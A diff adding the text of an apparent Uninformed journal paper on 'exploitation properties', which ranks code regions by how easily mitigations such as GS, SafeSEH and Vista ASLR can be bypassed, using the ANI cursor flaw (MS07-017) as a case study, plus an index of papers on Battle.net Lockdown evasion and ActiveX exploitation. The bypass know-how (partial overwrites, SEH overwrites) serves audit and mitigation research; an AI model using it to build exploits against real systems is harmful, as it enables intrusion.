wish to +determine the regions of code that may permit the use of traditional +stack-based buffer overflow techniques as well as permitting a partial +overwrite of a return address in order to defeat ASLR. Using these two +exploitation properties as criteria, a narrowed subset can be produced +which contains only those regions which meet both criteria by intersecting +those regions that have both exploitation properties. For the purpose of +this paper, the term narrowing is not used in the strict mathematical +sense; rather, this paper uses narrowing to describe the process of +constraining the scope of analysis through the use of specific criteria. + +The concept of using automated analysis as a precursor to more strenuous +program analysis is certainly not new. There have been many tools ranging +from the simple detection of calls to strcpy to much more sophisticated forms +of static analysis. Still, the use of exploitation properties can be seen as +an additional set of data points which may be useful in the context of program +analysis given the hypothesis that most reliably exploitable security +vulnerabilities are being pushed into areas of code that are less affected by +mitigations. + +The concept of exploitation properties is presented as follows. Section 2 +categorizes and defines a limited number of concrete exploitation properties. +Section 3 provides a concrete example of using exploitation properties to help +identify the function that contained the ANI vulnerability. Section 4 +describes some potential ways in which exploitation properties can be applied. +Section 5 gives a brief description of future work involving exploitation +properties. + +2) Exploitation Properties + +Exploitation properties describe the ease with which an arbitrary +vulnerability might be exploited. An understanding of a system's perceived +exploitability can provide useful insights when attempting to establish the +risk factors associated with it. An example of this can be seen in threat +modeling where the DREAD model of classifying risk includes a high-level +evaluation of exploitability as one of the risk factors[14]. It is important +to note that exploitation properties do not provide any indication that a +vulnerability exists; instead, they are only meant to convey information about +how easily a vulnerability could be exploited. The concept of an exploitation +property can be broken into different categories which are tied to the +configuration or context that the property is associated with. Examples of +these categories include platforms, processes, binary modules, functions, and +so on. + +The following subsections provide concrete examples to better illustrate the +concept of an exploitation property. These examples are given by showing what +implications a property has with respect to exploitation as well as how a +property might be derived. It should be noted that the examples given in this +paper do not represent a complete, exhaustive set of exploitation properties. + +2.1) Platform Properties + +Exploitation properties associated with a platform are meant to illustrate how +easily a vulnerability may be exploited when a given platform configuration, +such as the operating system or architecture, is used. For example, Windows +2000 does not include support for enforcing non-executable pages. This +implies that any vulnerability found within an application that runs in the +context of the Windows 2000 platform may be exploited more easily. An +understanding of exploitation properties that are associated with a platform +may be useful when attempting to assess the risk of applications that might +run on multiple platforms. There are many other examples of exploitation +properties that are tied to platforms. In order to limit the scope of this +document, platform exploitation properties are not discussed at length. + +2.2) Process Properties + +Process exploitation properties carry some information about how easily +vulnerabilities found within the context of a running process may be +exploited. For example, Internet Explorer running on 32-bit versions of +Windows Vista do not make use of hardware-enforced DEP (NX) by default. This +means that any vulnerabilities found within code that runs in the context of +Internet Explorer will not be protected by non-executable regions. An +understanding of exploitation properties that are associated with a process +context can help to provide a better understanding of the risks associated +with code that may run in the context of a given process. In order to limit +the scope of this document, process exploitation properties are not discussed +at length. + +2.3) Module Properties + +Module exploitation properties are used to illustrate the effect that a +particular binary module has on ease of exploitation. This category of +properties is useful when attempting to identify binaries that may be more +easily exploited if a vulnerability is found within them or in code that +depends on them. This subsection describes two examples of module +exploitation properties. + +2.3.1) No Support for ASLR + +Windows Vista was the first major release of Windows to include a built-in +implementation of Address Space Layout Randomization (ASLR)[15,24]. In order +to head off potential application compatibility issues, Microsoft chose to +make ASLR an opt-in feature by requiring binaries to be compiled with a new +compiler switch (/dynamicbase)[21]. This compiler switch is responsible for +setting a bit (0x40) in the DllCharacteristics that are defined within a +binary. If this bit is set, the Windows kernel will attempt to randomize the +base address of the binary when it is mapped into memory the first time. If +the bit is not set, the binary will not have its base address randomized, +although it could be relocated in memory if the binary's preferred region is +already occupied by another allocation. As such, any binary that does not +support ASLR may be mapped at a predictable location within a process address +space at execution time. This can allow an attacker to make assumptions about +the address space which may make exploitation easier if a vulnerability is +found within any code that is mapped into the same address space as the module +of interest. + +2.3.2) No Support for SafeSEH + +With Visual Studio 2003, Microsoft introduced a compile-time change known as +SafeSEH which attempts to act as a mitigation for the SEH overwrite attack +vector[5,9]. SafeSEH works by adding a static list of known good exception +handlers that are considered valid as metadata within a given binary. +Binaries that support SafeSEH allow the exception dispatcher to perform +additional checks when dispatching exceptions. The most important check +involves determining if an exception handler that is found to exist within the +mapped region of a given binary is actually considered to be one of the safe +exception handlers. If the exception handler is not a safe exception handler, +the exception dispatcher can take steps to prevent it from being called. This +behavior works to mitigate the potential exploitation vector. + +In order to communicate this information to the exception dispatcher, modern +PE files include fields in the load config data directory which hold the +offset of the safe exception handler table and the number of elements found +within the table. The load config data directory contains meta data that is +useful to the dynamic loader such as information about safe exception +handlers, the module's global security cookie address, and so on[13]. The +following output from dumpbin.exe illustrates what this might look like: + + 310751E0 Safe Exception Handler Table + 1 Safe Exception Handler Count + +Safe Exception Handler Table + + Address + -------- + 310357D1 __except_handler4 + +Unfortunately, as with ASLR, the benefits offered by SafeSEH are not complete +unless every binary that is loaded into an address space has been compiled to +make use of SafeSEH. If a binary has not been compiled to make use of +SafeSEH, an attacker may be able to use any address found within the binary's +memory mapping as an exception handler in conjunction with an SEH overwrite. + +2.4) Function Properties + +Function exploitation properties convey information about how a function +contributes to the exploitability of an application. For example, a function +might make it possible to use certain exploitation techniques that might +otherwise be prevented if mitigations were present. Alternatively, a function +might simply assist in the exploitation process. Function exploitation +properties are especially useful because they provide more detailed +information than exploitation properties that are derived from the platform, +process, or module context. + +2.4.1) Absence of GuardStack + +The GuardStack (GS) support included with versions of the Microsoft Visual +Studio compiler since 2002 offers a compile-time mitigation to traditional +stack-based buffer overflows[23]. It supports this through a combination of a +random canary inserted into a stack frame at runtime and an intelligent stack +frame layout algorithm. The random canary is pushed onto the stack when a +function is called and then popped off the stack and validated prior to +function return. If the canary does not match the expected value, it is +assumed that a stack-based buffer overflow occurred and that the process +should be terminated. + +Since the initial release of GS support a number of techniques have been +described that could be used to bypass or weaken it[5, 16, 20]. While these +techniques were at one time useful or have not yet been fully realized, the +author assumes that most would agree that the GS implementation provided by +the most recent compiler is robust (with the exception of SEH). There is +currently no publicly known universal bypass technique for GS that the author +is aware of. Given this assumption, functions that are protected by GS become +less interesting from the standpoint of identifying stack-based buffer +overflows. On the other hand, functions that are not protected by GS can +instantly be qualified as interesting targets for review. This is especially +true with binaries that have been compiled with GS support but contain a +number of functions that the compiler has chosen not to compile with GS +protections. This choice is made by taking into account certain conditions such +as the presence or absence of local variables that are declared as fixed-size +arrays. + +As previous research has illustrated[27], it is possible to identify functions +that have not been compiled to use GS through the use of simple static +analysis tools. It is also possible to further refine the approaches +described in previous research if one has symbols and one assumes that the +most recent compiler was used. This can be accomplished by analyzing the call +graph of an executable and noting the set of functions that do not call +securitycheckcookie. Considered another way, the same set of functions can be +identified by taking the set of all functions contained within a binary less +the subset that call securitycheckcookie. The set of functions that is +identified by either approach can be annotated with an exploitation property +that indicates that they may contain stack-based buffer overflows that would +not be hindered by GS. + +It may also be prudent to take the compiler version that was used into +consideration when analyzing binaries. This is important due to the fact that +older versions of the compiler used a GS implementation that could be +trivially defeated in certain circumstances[16]. For example, previous versions +of GS did not layout the stack frame in a manner that would prevent an +attacker from overwriting other local variables and function arguments. In +scenarios where this occurred and an overwritten local variable or parameter +was dereferenced (such as by invoking a function pointer), the mitigation +offered by GS would be meaningless. Thus, a secondary exploitation property +could involve identifying functions where attacks such as the one described +above could be possible. + +2.4.2) Partial Overwrite Feasibility + +One of the unique consequences of implementing Address Space Layout +Randomization (ASLR) on Windows is the limitation that the system allocation +granularity imposes on the number of bits that can be randomized within most +memory allocations. In particular, the allocation granularity used by Windows +enforces strict 16-page alignment for the base addresses of most memory +mappings in user-mode. This restriction means that it is only possible to +introduce entropy into the low 15 bits of the high-order 16 bits of a 32-bit +memory mapping[17]. While this may sound odd at first glance, the high-order two +bits are not randomized due to the divide between kernel and user-mode. This +assumes that a machine is booted without /3GB. The low-order 16 bits remain +unchanged relative to the high-order bits. This caveat means that it may be +possible to perform a partial overwrite of an address and thus bypass the +security features offered by ASLR[2]. However, the ability to perform a partial +overwrite also relies on the presence of useful code or data within a region +that is relative to the address that is being overwritten. + +To visualize how this type of information might be useful, consider a scenario +where an attacker is performing a partial overwrite of a return address on the +stack. In this situation, it is often necessary for one or more useful +opcodes to be present at an address that is 16-page relative to the return +address. For example, consider a scenario where the function may have a +vulnerability that would permit a partial overwrite. In this example, is +called by and . In order to permit the use of a partial overwrite, a useful +opcode must be found within the same 16-page aligned region that either or +reside on. If a useful opcode is present, an exploitation property can be +attached to in order to indicate that a partial overwrite may be feasible due +to the presence of a useful opcode within the same 16-page aligned region as +either or . For example, consider the following pseudo-disassembly +illustrating a case where the call f instruction in is on the same 16-page +region as a useful opcode: + +... useful jmp on same 16-page region 0x14c1XXXX +0x14c1fc04 jmp esp +... entry point to h() +0x14c1a910 push ebp +0x14c1a911 mov ebp, esp +0x14c1a914 call f +... entry point to y(), not on same 16-page region +0x137f44c8 push ebp + +While this captures the basic concept, a better approach might be to view a +binary in a different way. For example, consider the following approach to +drawing the same conclusion: for each code region that contains a useful +opcode, identify the subset of functions that are called from call sites +within the same 16-page aligned region as the useful opcode. This has the +effect of annotating all of the child functions that could potentially +leverage a partial overwrite of the return address with respect to a +particular collection of opcodes. + +One important point that must be made about this exploitation property is that +is entirely dependent upon the definition of "useful code or data". +Exploitation is very much an art and it goes without saying that attempting to +constrain the approaches that an attacker might make use of is likely to be +folly. However, defining a known-set of useful opcodes and using that set as +a base with which to draw the above conclusion can be said to be better than +not doing so at all. + +2.4.3) Function or Parent Registers an Exception Handler + +One of the unique exploitation vectors that exists in 32-bit programs that run +on Windows is known as an SEH overwrite[5]. An SEH overwrite makes it possible +to gain control of execution flow by overwriting an exception registration +record on the stack. From an exploitation perspective, the act of registering +an exception handler within a function opens up the possibility of making use +of an SEH overwrite. Since exception handlers are chained, the act of +registering an exception handler also implicates any functions that are +children of a function that registers the exception handler. This makes it +possible to define an exploitation property that illustrates the possibility +of an SEH overwrite being abused within the scope of a specific set of +functions. Detecting this property can be as simple as signaturing the +compiler generated code that is used to generate and register an exception +handler within a function. An example of two functions, and , that would +meet this criteria can be seen below: + +void f() { + __try { + g(); + } __except(EXCEPTION_EXECUTE_HANDLER) { + } +} + +void g() { + ... +} + +In addition to this information being useful from an SEH overwrite +perspective, it may also benefit an attacker in situations where an exception +handler simply swallows any exceptions that are dispatched without crashing +the process[1]. In the example given above, any exception that occurs in the +context of will be swallowed by without necessarily crashing the process. +This behavior may allow an attacker to retry their exploitation attempt +multiple times, thus enabling a bruteforce attack that would otherwise not be +feasible. This can make defeating ASLR more feasible. + +2.4.4) Function is an Exception Handler + +The introduction of SafeSEH as a modern compile-time mitigation has caused the +particulars of how exception handlers are implemented to become more +interesting. This has to do with the fact that SafeSEH restricts the set of +exception handlers that may be called by the exception dispatcher to those +that are specified as being valid within the scope of a given binary. As +discussed previously in this paper, SafeSEH prevents traditional SEH +overwrites from being able to use any address as the overwritten exception +handler. While this is effective in its primary intent, there is still the +possibility that a valid exception handler can be abused to make exploitation +more feasible[1]. This scenario is restricted to EH3 and prior exception +handlers as EH4 includes a check of a cookie before dispatching exceptions. +As such, it may be useful to flag the regions of code that are associated with +EH3 and prior exception handlers, including language-specific exception +handlers, as being potentially interesting from an exploitation perspective. + +Unfortunately, as with ASLR, the benefits offered by SafeSEH are not complete +unless every binary that is loaded into a process address space has been +compiled to make use of SafeSEH. If a binary has not been compiled to make +use of SafeSEH, an attacker may be able to use any address found within the +binary's memory mapping as an exception handler in the context of an SEH +overwrite. This may make exploitation more feasible. + +3) Case Study: MS07-017 + +The animated cursor (ANI) vulnerability was discovered by Alexander Sotirov in +late 2006 and patched by Microsoft with the MS07-017 critical update in April, +2007 . Apart from being a client-side vulnerability that was exposed through +web-browsers and other mediums, the ANI vulnerability was one of the first +notable security issues that affected Windows Vista. It was notable due to +the simple fact that even though Microsoft had touted Windows Vista as being +the most secure operating system to date, the exploits that were released for +the ANI vulnerability were very reliable. These exploits were able to ignore +or defeat the protections offered by mitigations such as GS, DEP, and even +Vista's newest mitigation: ASLR. + +To better understand how this was possible it is important to dive deeper into +the details of the vulnerability itself. gives a brief description of the +ANI vulnerability and some of the techniques that were used to successfully +exploit it. Following this description, illustrates how exploitation +properties, in combination with another class of properties, can be used to +detect functions that may contain vulnerabilities similar to the ANI +vulnerability. This is meant to help illustrate the perceived benefits of +applying the concept of exploitation properties to aide in the process of +identifying regions of code that may deserve additional scrutiny based on +their perceived exploitability. + +3.1) Background + +While the ANI vulnerability was certainly unique, it was not the first time +the animated cursor code was found to have a security issue. Microsoft patched +an issue that was almost exactly the same as MS07-017 with MS05-002 roughly +two years prior. In both cases, the underlying security issue was related to +a failure to properly validate input that was derived from the contents of an +animated cursor file. Alexander Sotirov provided much of the initial research +on the ANI vulnerability and also gave an excellent write-up to its effect[22]. +This paper will only attempt to highlight the flaw. + +The vulnerability itself was found in user32!LoadAniIcon which is responsible +for processing a number of different chunks that may be contained within an +animated cursor file. Each chunk is a TLV (Type-Length-Value) as described +by the following structure: + +struct ANIChunk +{ + char tag[4]; // ASCII tag + DWORD size; // length of data in bytes + char data[size]; // variable sized data +} + +Keeping this structure in mind, the flaw itself can be seen in the abbreviated +pseudo-code below as modified slightly from Sotirov's original write-up: + +01: int LoadAniIcon(struct MappedFile* file, ...) { +02: struct ANIChunk chunk; +03: struct ANIHeader header; // 36 byte structure +04: while (1) { +05: // read the first 8 bytes of the chunk +06: ReadTag(file, &chunk); +07: switch (chunk.tag) { +08: case 'anih': +09: // read chunk.size bytes into header +10: ReadChunk(file, &chunk, &header); + +On line 6, the chunk header is read into the local variable chunk using +ReadTag which populates the chunk's tag and size fields. If the chunk's tag +is equal to 'anih', the data associated with the chunk is read into the header +local variable using ReadChunk on line 10. The problem is that ReadChunk uses +the size field of the chunk as the amount of data to read from the file. +Since header is a fixed-size (36 byte) data structure and the chunk's size can +be variable, a trivial stack-based buffer overflow may occur if more than 36 +bytes are specified as the chunk size. In terms of the vulnerability, that's +all there is to it, but the implications from an exploitation perspective are +where things start to get interesting. + +When attempting to exploit this vulnerability it may at first appear that all +attempts to do so would be futile. Given Vista's security push, an attacker +would be justified in thinking that surely the LoadAniIcon function is +protected by a GS cookie. This point is especially justified considering the +majority of all binaries shipped with Windows Vista have been compiled with GS +enabled[27]. However, there are indeed circumstances where the compiler will +choose to not enable GS for a specific function. As chance would have it, the +compiler chose not to enable GS for the LoadAniIcon function because of the +simple fact that it does not contain any characteristics that would suggest +that a stack-based buffer overflow might be possible (such as the use of +stack-allocated arrays). This means that an attacker is able to make use of +exploitation techniques that are associated with traditional stack-based +buffer overflows. While this drastically increases the chances of being able +to produce a reliable exploit, there are still other mitigations that are of +potential concern. + +Another mitigation that might be concerning in most circumstances is +hardware-enforced DEP (NX). This would generally prevent an attacker from +being able to run arbitrary code within regions that are not marked as +executable (such as the stack and the heap). However, as fate would have it, +Internet Explorer is configured to not run with DEP enabled. This immediately +removes this concern from the equation for exploits that attempt to trigger +the ANI vulnerability through Internet Explorer. With DEP out of the picture, +ASLR becomes a weakened but still potentially significant hurdle. + +While it may appear that ASLR would be challenging to defeat in most +circumstances, this particular vulnerability provides an example of two +different ways in which ASLR can be bypassed. The simplest approach, as taken +by Sotirov, involves making use of the fact that Internet Explorer is not +compiled with support for ASLR and therefore can be found at a fixed address +within the address space. This allows an attacker to make use of opcodes +contained within iexplore.exe's memory mapping. A second approach, as taken +by the author, involves using a partial overwrite to ignore the effects of +ASLR completely. The details relating to how a partial overwrite works were +explained in 2.4.2. In either case, an attacker is able to reliably defeat Vista's +ASLR. + +To compound the problem, the particulars of the context in which this +vulnerability occur make it easier to exploit even without the presence of +mitigations. This improved reliability comes from the fact that the +LoadAniIcon function is wrapped in an exception handling context that simply +swallows exceptions that are encountered. This makes it possible for an +exploit to fail without actually crashing the process, thus allowing the +attacker to try multiple times without having to worry about making a mistake +that crashes the process. When all is said and done, the simplicity of the +vulnerability and the ease with which mitigations could be bypassed are what +lead to the ANI vulnerability being quite unique. Given the fact that this +vulnerability can be so easily exploited, it is prudent to describe how it +could have been detected as being a high risk function. + +3.2) Detection + +The ease of exploitability associated with the ANI vulnerability makes it an +obvious candidate for study with respect to the exploitation properties that +have been described in this paper. It should be possible to use extremely +simple criteria to accomplish two things. First, the criteria must identify +the LoadAniIcon function. Second, the criteria should be unique enough to +limit the size of the narrowed subset. Reducing the subset size is beneficial +as it may permit the use of more complex program analysis tools which can +further constrain or explicitly identify instances of vulnerabilities. +Determining the specific criteria that is needed to identify the LoadAniIcon +function can help illustrate how one can make use of exploitation properties. +Given the description of the ANI vulnerability, one can easily deduce some of +the more interesting properties that it has. + +An exploitation property that one might immediately observe is that the +LoadAniIcon function does not make use of GS (2.4.1). This makes it possible to +define criteria which states that only functions that have not been compiled +with GS should be considered. Functions that have been compiled with GS are +inherently less interesting for the purpose of this exercise due to the fact +that they are less likely to contain exploitable vulnerabilities. + +A second property that the ANI vulnerability had with regard to exploitation +was that it was possible for an attacker to make use of a partial overwrite to +defeat ASLR. The exploitation property described in 2.4.2 illustrates how one can +make this determination statically. In the case of the ANI vulnerability, a +partial overwrite can be performed by making use of a jmp [ebx] that is +located within the same 16-page aligned region as the caller of LoadAniIcon. +Thus, any functions that could potentially make use of a partial overwrite can +be used as additional criteria. + +At this point, a subset can be produced that is constrained to the regions of +code that are annotated with the GS and partial overwrite exploitation +properties. It is possible to further refine the set of functions that should +ultimately be considered by studying the form that the ANI vulnerability took. +The first point to note is that the stack-based buffer overflow occurred when +writing beyond the bounds of a struct that was allocated on the stack. +Furthermore, the overflow did not actually occur in the immediate context of +the LoadAniIcon itself. Instead, the overflow was triggered by passing a +pointer to the stack-allocated struct as a parameter when calling the function +ReadChunk. + +Based on these data points it is possible to define a third criteria. In this +case, the third criteria is not an exploitation property but is instead an +example of a vulnerability property. While not discussed in detail in this +paper, many examples of vulnerability properties exist, though perhaps not +categorized as such. A vulnerability property can be thought of as an +annotation that illustrates whether or not a region of code has a form that is +similar to that seen in vulnerabilities or has the potential of being a +vulnerability. The complexity of a vulnerability property, as with the +complexity of an exploitation property, can range from highly sophisticated to +very simplistic. + +For the purpose of this paper, a vulnerability property can be used that is +very simple and imprecise but nevertheless effective at further narrowing the +set of functions that should be reviewed. This property is based on whether +or not a function passes a pointer to a stack-allocated variable as a +parameter to a child function. This property is directly derived from the +general form that the ANI vulnerability takes. At a minimum, a region of code +that matches this form suggests that a vulnerability could be present. + +Using these three properties, it should be possible to easily identify both +the function that contains the ANI vulnerability as well as other functions +that could contain similar vulnerabilities. However, it is important to note +that this process does not produce functions that definitely have +vulnerabilities. This can be plainly seen by the fact that both the +vulnerable and fixed versions of the LoadAniIcon should be detected by the +criteria described above. While this may seem to run counter to the purposes +of this paper, it is important for the reader to remember that the goal of +using these exploitation properties is not to identify specific instances of +vulnerabilities. Instead, the goal is to identify regions of code that might +warrant additional scrutiny due to the relative ease with which a +vulnerability could be exploited if one is found to be present. + +3.3) Test Case + +The author developed an analysis tool as an extension to Microsoft's Phoenix +framework in order to test the ideas described in this paper[12]. Unfortunately, +the current release (July 2007 SDK) of Phoenix requires private symbol +information for native binaries. This limitation prevented the author from +being able to run the analysis tool across the vulnerable version of +user32.dll. In lieu of this ability, the author chose to generate a binary +containing test cases that closely mirror the form of the function containing +the ANI vulnerability. + +Using these test cases, the author used the features provided by the analysis +tool to determine the exploitation and vulnerability properties described in +the previous section and to identify the resulting subset of functions meeting +all criteria. This was accomplished by first attempting to identify the +subset of functions that do not contain GS within the scope of the target +binary. After identifying the subset of functions without GS, a second subset +was taken which consists of the functions that pass a pointer to a +stack-allocated local variable as a parameter to a child routine. This was +accomplished by using Phoenix's static single assignment (SSA) and alias +implementations to collect the requisite data flow information[12,25]. Using this +data flow information, it is possible to perform backwards data flow analysis +to determine the potential storage location of the parameter being passed at +each point along a given data flow path starting from the operand associated +with a parameter at a call site. The analysis terminates either when a fixed +point is reached or when it is determined that a pointer to a stack-allocated +variable could be passed as the parameter. + +While the previous section described the potential for using the partial +overwrite exploitation property to detect the function containing the ANI +vulnerability[6], it is not possible to create a meaningful parallel between the +test binary and that of the ANI vulnerability. This is due in part to the +fact that while it would certainly be possible to artificially place a useful +opcode at a specific location in the test binary, it would not add any value +beyond showing that it is possible to detect useful opcodes within the same +16-page aligned region as the caller of a given function. The author feels +that this point is somewhat moot given the fact that it has already been +proven that a partial overwrite can be used with the ANI vulnerability. The +only additional benefit that it could offer in this case would be to help +further constrain the resultant set size. However, without being able to run +this analysis against the vulnerable version of user32.dll, it is not possible +to draw meaningful conclusions at this point in time. + +3.4) Results + +The results of running the analysis tool against the test binary produced the +expected behavior. To illustrate this, it is helpful to consider a sampling +of the functions that were analyzed. The following functions have a form that +is similar to the ANI vulnerability. These functions also match the criteria +described in the previous subsection. Specifically, these functions do not +make use of GS and pass a pointer to a stack-allocated local variable (var) to +a child function: + +int tc_df_pass_local_ptr_to_callee() { + int var; + tc_df_pass_local_ptr_to_callee_func(&var); + return 0; +} +int tc_df_pass_local_ptr_to_callee_alias() { + int var; + int *p = &var; + tc_df_pass_local_ptr_to_callee_func(p); + return 0; +} +int tc_df_pass_local_ptr_to_callee_alias_struct( + struct _foo *foo) { + int var; + foo->ptr = &var; + return tc_df_pass_local_ptr_to_callee_func( + foo->ptr); + return 0; +} + +Additionally, a handful of different test functions were also included in the +target binary in an effort to ensure that other scenarios were not improperly +detected as matching the criteria. Some examples of these functions include: + +int tc_df_pass_local_to_callee_alias() { + int var = 2; + int p = var; + tc_df_pass_local_to_callee_func(p); + return 0; +} +int tc_df_pass_local_to_callee_deref() { + int var = 2; + int *p = &var; + tc_df_pass_local_to_callee_func(*p); + return 0; +} +int tc_df_pass_heap_ptr_to_callee(struct _foo *foo) { + tc_df_pass_local_ptr_to_callee_func(&foo->val); + return 0; +} + +When running the analysis tool against the target binary, the following output +is shown: + +>PhaseRunner.exe detectani.xml dfa.exe +Running phase: ANI Detection ... 1 target(s) + +Displaying 3 normalizables at the + ProgramElement.Method granularity... + +00001: dfa!tc_df_pass_local_ptr_to_callee_alias +00002: dfa!tc_df_pass_local_ptr_to_callee +00003: dfa!tc_df_pass_local_ptr_to_callee_alias_struct + +While this unfortunately does not prove that these techniques could be used to +identify the function containing the ANI vulnerability, it does nevertheless +hint at the potential for detecting the function containing the ANI +vulnerability using its suggested exploitation and vulnerability properties. +As an side, another interesting way in which this type of detection can be +accomplished is through the use of Language Integrated Queries (LINQ) which +are now supported in Visual Studio 2008[11]. For instance, a simple LINQ +expression for the above narrowing operation can be expressed as: + +var matches = + from + Method method in engine.GetScopeMethods() + where + !method.IsGuardStackEnabled() && + method.IsPassingStackLocalPtrToChild() + select method; + +foreach (var method in matches) + Console.WriteLine("{0} matches", method); + +4) Potential Uses + +Program analysis is one area that may benefit from the use of exploitation +properties. In particular, an auditor can make use of exploitation properties +to assist in the process of identifying regions of code that should be audited +more closely or with greater precedence. This determination can be made by +using exploitation properties to understand the ease of exploitation +associated with specific binaries or functions. By combining this information +with other data that is collected either manually or automatically, an auditor +can get a better understanding of the security aspects that are associated +with a system. This is beneficial both to an attacker and a defender. An +attacker can identify regions of code that would be easier to exploit and thus +devote more time to auditing those regions. Likewise, a defender can use this +information to the same extent but for different purposes. This type of +information is especially useful to a defender who needs to balance the cost +associated with performing security reviews because it should offer a better +understanding of what the business cost might be if a vulnerability is found +in a region of code. This cost can be derived from the negative publicity and +response effort needed to cope with a flaw that is found publicly in a region +of code that is widely exploited. For example, consider some of the Windows +flaws that have lead to wormable issues and the cost they have had relative to +other issues. + +Exploitation properties may also benefit the security community by helping to +identify ways in which future mitigations can be applied. This would involve +analyzing regions of code that could be more easily exploited in an effort to +determine what other forms of mitigations could help to protect these regions, +if any. This information could be fed back to the compiler to make it +possible for mitigations to be enabled that might otherwise be disabled by +default. For example, a function that by default would not have GS but is +subsequently found to be highly exploitable may benefit from having the +compiler insert GS. + +5) Future Work + +While this paper has defined exploitation properties and described a handful +of concrete examples, it has not attempted to formally define the correlation +between exploitation properties and the exploitation techniques they are +associated with. Future research will attempt to concretely define this +relationship as it should lead to a better understanding of the variables that +permit the use of various exploitation techniques. Using more formal +definitions of exploitation properties, a larger scale case study can be +completed which collects data about the effect of using exploitation +properties to improve program understanding for a variety of purposes. The +author views exploitation properties as being one component in a larger model. +This larger model could be used to join major areas of study within computer +security including attack surface analysis, vulnerability analysis, and +exploitation analysis to form a more complete understanding of the true risks +associated with a system. + +6) Conclusion + +This paper has introduced the general concept of exploitation properties and +described how they can be used to better understand the exploitability of a +system. The purpose of an exploitation property is to help convey the ease +with which a vulnerability might be exploited if one is found to be present. +Exploitation properties can be broken down into different categories based on +the configuration or context that a given property is associated from. These +categories include operating platforms, running processes, binary modules, and +functions. + +Exploitation properties can be used to provide an alternative understanding of +an application's attack surface from the perspective of which areas would be +most trivially exploited. This can allow an attacker to focus on finding +security issues in code that would be more easily exploited. Likewise, a +defender can draw the same conclusions and direct resources of their own at +reviewing the associated code. It may also be possible to use this +information to augment existing mitigations or to come up with new +mitigations. A contrived example based on the form of the ANI vulnerability +was used to illustrate an automated approach to extracting exploitation +properties and using them to help identify a constrained subset of regions of +code that meet a specific criteria. Future research will attempt to better +define the extent of exploitation properties and their uses. + +[1] Dowd, M., Metha, N., McDonald, J. Breaking C++ Applications. + https://www.blackhat.com/presentations/bh-usa-07/Dowd_McDonald_and_Mehta/Whitepaper/bh-usa-07-dowd_mcdonald_and_mehta.pdf + +[2] Durden, Tyler. Bypassing PaX ASLR Protection. July, 2002. + http://www.phrack.org/issues.html?issue=59&id=9 + +[3] Howard, Michael. Protecting against Pointer Subterfuge (Kinda!). + http://blogs.msdn.com/michael_howard/archive/2006/01/30/520200.aspx + +[4] Johnson, Richard. Windows Vista: Exploitation Countermeasures. + http://rjohnson.uninformed.org/ + +[5] Litchfield, David. Defeating the Stack Based Buffer Overflow Prevention + Mechanism of Microsoft Windows 2003 Server. + http://www.nextgenss.com/papers/defeating-w2k3-stack-protection.pdf + +[6] Metasploit. Exploiting the ANI vulnerability on Vista. + http://blog.metasploit.com/2007/04/exploiting-ani-vulnerability-on-vista.html + +[7] Microsoft Corporation. Microsoft Security Bulletin MS05-002. Jan, 2005. + http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx + +[8] Microsoft Corporation. /GS (Buffer Security Check). + http://msdn2.microsoft.com/en-us/library/8dbf701c(VS.80).aspx + +[9] Microsoft Corporation. /SAFESEH (Image has Safe Exception Handlers). + http://msdn2.microsoft.com/en-us/library/9a89h429.aspx + +[10] Microsoft Corporation. A detailed description of the Data Execution + Prevention (DEP) feature. http://support.microsoft.com/kb/875352 + +[11] Microsoft Corporation. The LINQ Project. + http://msdn2.microsoft.com/en-us/netframework/aa904594.aspx + +[12] Microsoft Corporation. Phoenix. http://research.microsoft.com/phoenix/ + +[13] Microsoft Corporation. Microsoft Portable Executable and Object File + Format Specification. + http://download.microsoft.com/download/9/c/5/9c5b2167-8017-4bae-9fde-d599bac8184a/pecoff_v8.doc + +[14] Microsoft Corporation. Threat Modeling. June, 2003. + http://msdn2.microsoft.com/en-us/library/aa302419.aspx + +[15] PaX Team. ASLR. http://pax.grsecurity.net/docs/aslr.txt + +[16] Ren, Chris et al. Microsoft Compiler Flaw Technical Note. + http://www.cigital.com/news/index.php?pg=art&artid=70 + +[17] Rahbar, Ali. An analysis of Microsoft Windows Vista's ASLR. Oct, 2006. + http://www.sysdream.com/articles/Analysis-of-Microsoft-Windows-Vista's-ASLR.pdf + +[18] skape, Skywing. Bypassing Windows Hardware-enforced DEP. + http://www.uninformed.org/?v=2&a=4&t=sumry + +[19] skape. Preventing the Exploitation of SEH Overwrites. + http://www.uninformed.org/?v=5&a=2&t=sumry + +[20] skape. Reducing the Effective Entropy of GS Cookies. + http://www.uninformed.org/?v=7&a=2&t=sumry + +[21] Skywing. Vista ASLR is not on by default for image base addresses. + http://www.nynaeve.net/?p=100 + +[22] Sotirov, Alexander. Windows Animated Cursor Stack Overflow + Vulnerability. March, 2007. + http://www.determina.com/security.research/vulnerabilities/ani-header.html + +[23] Wikipedia. Stack-smashing protection. + http://en.wikipedia.org/wiki/Stack-smashing_protection + +[24] Wikipedia. Address space layout randomization. + http://en.wikipedia.org/wiki/ASLR + +[25] Wikipedia. Static single assignment form. + http://en.wikipedia.org/wiki/Static_single_assignment_form + +[26] University of Wisconsin. Wisconsin Program-Slicing Project's Home Page. + http://www.cs.wisc.edu/wpis/html/ + +[27] Whitehouse, Ollie. Analysis of GS protections in Microsoft Windows + Vista. http://www.symantec.com/avcenter/reference/GS_Protections_in_Vista.pdf diff --git a/uninformed/9.txt b/uninformed/9.txt new file mode 100644 index 0000000..893a1ba --- /dev/null +++ b/uninformed/9.txt @@ -0,0 +1,22 @@ +Engineering in Reverse +An Objective Analysis of the Lockdown Protection System for Battle.net +Skywing +Near the end of 2006, Blizzard deployed the first major update to the version check and client software authentication system used to verify the authenticity of clients connecting to Battle.net using the binary game client protocol. This system had been in use since just after the release of the original Diablo game and the public launch of Battle.net. The new authentication module (Lockdown) introduced a variety of mechanisms designed to raise the bar with respect to spoofing a game client when logging on to Battle.net. In addition, the new authentication module also introduced run-time integrity checks of client binaries in memory. This is meant to provide simple detection of many client modifications (often labeled "hacks") that patch game code in-memory in order to modify game behavior. The Lockdown authentication module also introduced some anti-debugging techniques that are designed to make it more difficult to reverse engineer the module. In addition, several checks that are designed to make it difficult to simply load and run the Blizzard Lockdown module from the context of an unauthorized, non-Blizzard-game process. After all, if an attacker can simply load and run the Lockdown module in his or her own process, it becomes trivially easy to spoof the game client logon process, or to allow a modified game client to log on to Battle.net successfully. However, like any protection mechanism, the new Lockdown module is not without its flaws, some of which are discussed in detail in this paper. +html | pdf | txt + +Exploitation Technology +ActiveX - Active Exploitation +warlord +This paper provides a general introduction to the topic of understanding security vulnerabilities that affect ActiveX controls. A brief description of how ActiveX controls are exposed to Internet Explorer is given 